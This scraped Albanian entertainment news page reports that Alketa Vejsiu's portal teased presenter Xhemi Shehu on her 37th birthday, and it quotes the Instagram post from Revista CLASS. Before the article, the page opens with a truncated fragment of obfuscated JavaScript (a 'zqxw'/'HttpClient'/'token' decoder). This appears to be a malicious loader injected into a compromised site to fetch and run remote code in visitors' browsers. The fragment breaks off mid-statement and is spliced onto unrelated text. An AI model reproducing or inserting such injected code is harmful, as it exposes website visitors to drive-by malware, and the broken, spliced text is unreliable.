;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Portali i Alketës thumbon keq Xhemi Shehun në ditën e lindjes së saj

By

Pas mbarimit të ‘Festivali i Këngës’, një prej videove më virale që pasoi ishte ironizimi që i bëri Xhemi Shehu bashkë me kolegun e saj, Salsano Rrapin, Alketa Vejsiut.

Në atë video, prezantuesja e ‘Portokalli’ çohej nga vendi duke thënë se ‘nuk rri njeriu me një veshje të njejtë për 5 minuta’ duke thumbuar kështu ndërrimin e shpeshtë të fustaneve nga Alketa gjatë prezantimit.

E duket se Vejsiu nuk e ka harruar këtë ironi therrëse duke zgjedhur që reston ta kthejë dyfish për ditëlindje të Xhemit, në vend të një urimi.

Në faqen e portalit të saj i cili duket të jetë shndërruar në një platformë të ‘qërimit të hesapeve personale’, për ditëlindjen e 37-të të prezantueses është nxjerrë një foto e saj nga arkiva ku fokusi qëndron në tre gjëra: stilin e flokëve të dikurshëm, pseudonimin ‘Xhemile’ dhe aftësitë e prezantueses në aktrim.

‘Në prezantim ka rivale të forta kështu që i sugjerojmë të merret seriozisht me karrierën e aktores së humorit. Ka të dhëna të mira aty! Me ndihmën e Salsanos, rolin e ‘Gagaçes’ do ta qante. Postimi është plotësisht dashamirës. Xhemin xhan! Juve si ju duket më mirë? Dikur apo sot?’ – thuhet mes tjerash në postimin e bërë i cili ka shkaktuar një varg të komenteve dhe polemikave mes ndjekëve.

Të plotë, shkrimin e portalit të Alketës mund ta lexoni më poshtë. /Prive.al

 

View this post on Instagram

 

Në arkivat e revistës ndjemë nostalgji për bukuroshen e ekranit! Mendojmë që tre gjera i shkojnë Xhemit! 1. Me këto flokët me rrica duket shumë kinge! Gjithmonë e bukur Xhemi! 2. Pseudonimi “Xhemile” i shkon shumë Xhemës tonë! 3. Edhe si aktore humori mund të fitonte një kupë në ”Golden Globes”! Nuk është keq me humorin edhe pse në hapat e parë të karrierës! Më mirë se në prezantim madje! Në prezantim ka rivale të forta kështu që i sugjerojmë të merret seriozisht me karrierën e aktores së humorit! Ka të dhëna të mira aty! Me ndihmën e Salsanos rolin e “Gagaçes” do ta qante! Postimi është plotësisht dashamirës! Xhemin Xhan! Juve si ju duket më mirë ? Dikur apo Sot?

A post shared by Revista CLASS (@revista_class) on

Artikuj të ngjashëm